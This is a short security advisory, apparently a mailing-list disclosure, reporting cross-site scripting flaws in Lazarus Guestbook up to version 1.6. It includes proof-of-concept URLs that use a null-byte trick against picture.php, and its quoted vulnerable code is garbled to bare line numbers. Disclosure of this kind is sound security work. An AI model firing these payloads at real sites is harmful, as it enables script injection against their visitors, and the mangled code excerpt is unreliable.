|
Produce : Lazarus Guestbook=0D
Website : http://carbonize.co.uk/Lazarus/=0D
Version : <= 1.6=0D
Problem : Cross Site Scripting=0D
=0D
1) =0D
The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised=0D
This can be exploited to execute arbitrary HTML and javascript code=0D
=0D
Vulnerable code in lang/codes-english.php near line 4=0D
=0D
1 =0D
2 =0D
3 =0D
4
=0D
50 \n";=0D
53 }=0D
54 ?>=0D
55 =0D
=0D
****************=0D
if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )=0D
=0D
POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]=0D
=0D
file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed=0D
=0D
Exploit: =0D
=0D
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]=0D
http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E=0D
=0D
Contact : simo64[at]gmail[dot]com=0D
Moroccan Security Research Team